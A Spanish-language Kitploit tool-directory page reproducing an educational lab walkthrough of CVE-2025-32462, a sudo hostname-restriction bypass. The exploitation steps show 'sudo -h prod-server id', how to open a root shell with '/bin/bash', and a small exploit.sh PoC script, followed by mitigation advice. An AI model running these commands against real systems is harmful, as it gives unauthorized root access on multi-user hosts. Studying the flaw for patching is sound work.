Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32462- — CVE-2025-32462 es una vulnerabilidad de escalada de privilegios local en sudo | Kitploit
Herramientas/GitHubGitHub/offsecplaybook/cve-2025-32462-
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHuboffsecplaybook/cve-2025-32462-

CVE-2025-32462-

CVE-2025-32462 es una vulnerabilidad de escalada de privilegios local en sudo

Ver Repositorio
hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32462 – Bypass de Hostname en Sudo para Escalada de Privilegios

CVE Cyber Security Penetration Testing Security Research

Tabla de Contenidos

  1. Resumen
  2. Detalles de la Vulnerabilidad
  3. Impacto
  4. Entorno de Laboratorio
  5. Verificación de la Versión Vulnerable
  6. Configuración de Usuario y sudoers
  7. Recorrido de Explotación
  8. Resumen de la Prueba de Concepto
  9. Por Qué Ubuntu No Es Vulnerable
  10. Mitigación
  11. Mapeo MITRE ATT&CK
  12. Referencias
  13. Aviso Legal

Resumen

CVE-2025-32462 es una vulnerabilidad de escalada local de privilegios en sudo que permite a un usuario con pocos privilegios ejecutar comandos como root abusando de las reglas de sudo restringidas por hostname. El problema reside en cómo sudo manejaba históricamente la opción -h (host) durante las comprobaciones de autorización.

Cuando una regla de sudoers está restringida a un hostname específico, sudo solo debería permitir la ejecución cuando el hostname del sistema coincide con la regla. Debido a una lógica defectuosa, las versiones afectadas confiaban en un hostname proporcionado por el usuario mediante sudo -h, lo que permitía a los atacantes omitir la restricción por completo.


Detalles de la Vulnerabilidad

  • ID de CVE: CVE-2025-32462
  • Tipo: Escalada Local de Privilegios
  • Componente Afectado: sudo
  • Vector de Ataque: Local
  • Privilegios Requeridos: Bajos (usuario no sudo)
  • Interacción del Usuario: Ninguna

Causa Raíz

sudo permitía que el argumento -h <hostname> influyera en las decisiones de autorización. En las versiones vulnerables, el hostname proporcionado se consideraba de confianza durante la evaluación de las reglas de sudoers, en lugar de validarse estrictamente contra el hostname real del sistema.

Como resultado, las restricciones de sudo basadas en host podían omitirse.


Impacto

Si se explota con éxito, un atacante local puede:

  • Ejecutar comandos arbitrarios como root
  • Comprometer completamente el sistema
  • Omitir los límites de seguridad administrativos

En entornos del mundo real, esta vulnerabilidad es especialmente peligrosa en:

  • Sistemas multiusuario
  • Entornos endurecidos que utilizan reglas de sudo específicas por host
  • Hosts bastión o saltadores (jump hosts)

Entorno de Laboratorio

ComponenteDetalles
SODebian 11 (Bullseye – sin parchear)
Versión de sudo≤ 1.9.13
Nivel de accesoUsuario local
VirtualizaciónVirtualBox

⚠️ Nota: Las versiones modernas de Ubuntu y Debian han incorporado parches retroaplicados (backports) manteniendo cadenas de versión similares. Esta vulnerabilidad no puede reproducirse en sistemas parcheados.


Paso 1 – Verificar la Versión Vulnerable de sudo

root@kitploit:~
sudo --version

Resultado esperado (vulnerable):

root@kitploit:~
Sudo version 1.9.5p2

Paso 2 – Crear un Usuario con Pocos Privilegios

root@kitploit:~
sudo useradd -m attacker
sudo passwd attacker
groups attacker

Resultado esperado:

root@kitploit:~
attacker : attacker

El usuario no debe pertenecer al grupo sudo.


Paso 3 – Configurar una Regla de sudoers Vulnerable

Edita sudoers de forma segura:

root@kitploit:~
sudo visudo

Añade la siguiente línea:

root@kitploit:~
attacker prod-server = (root) ALL
  • prod-server es un hostname falso
  • El hostname real del sistema debe ser diferente

Verifica:

root@kitploit:~
sudo -l -U attacker

Resultado esperado:

root@kitploit:~
User attacker may run the following commands on prod-server:
    (root) ALL

Paso 4 – Confirmar que el sudo Normal es Denegado

Cambia de usuario:

root@kitploit:~
su - attacker

Intenta ejecutar sudo de forma normal:

root@kitploit:~
sudo id

Resultado esperado:

root@kitploit:~
attacker is not allowed to run sudo on <hostname>

Paso 5 – Explotación (CVE-2025-32462)

Activa la vulnerabilidad:

root@kitploit:~
sudo -h prod-server id

Salida de una explotación exitosa:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root)

Abre una shell de root:

root@kitploit:~
sudo -h prod-server /bin/bash

Verifica:

root@kitploit:~
id

Resumen de la Prueba de Concepto

Script PoC Automatizado (Opcional)

root@kitploit:~
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id

Guárdalo como exploit.sh, hazlo ejecutable y ejecútalo como el usuario attacker:

root@kitploit:~
chmod +x exploit.sh
./exploit.sh
AcciónResultado
sudo normal❌ Denegado
sudo -h prod-server id✅ Root

Esto confirma una escalada de privilegios exitosa.


Por Qué Ubuntu No Es Vulnerable

Las versiones modernas de Ubuntu parecen incluir versiones de sudo que se encuentran dentro del rango afectado. Sin embargo, Ubuntu ha retroaplicado el parche de seguridad para CVE‑2025‑32462 sin cambiar la cadena de versión original.

Como resultado:

  • La opción sudo -h ya no influye en las comprobaciones de autorización
  • La suplantación de hostname se rechaza correctamente
  • La vulnerabilidad no puede reproducirse a pesar de tener números de versión similares

Esto resalta la importancia de validar el estado de la vulnerabilidad mediante pruebas de comportamiento, y no solo mediante las cadenas de versión.


Mitigación

  • Actualiza sudo a una versión parcheada
  • Elimina las reglas de sudo restringidas por host siempre que sea posible
  • Supervisa los intentos de escalada local de privilegios

Mapeo MITRE ATT&CK

  • TA0004 – Escalada de Privilegios
  • T1548.003 – Abuso del Mecanismo de Control de Elevación (sudo)

Referencias

  • Aviso de CVE‑2025‑32462
  • Anuncios de Seguridad del Proyecto sudo
  • Rastreador de Seguridad de Debian

Aviso Legal

Este recorrido tiene fines exclusivamente educativos y de investigación defensiva en seguridad. No pruebes esta vulnerabilidad en sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de evaluación.

Descargar herramienta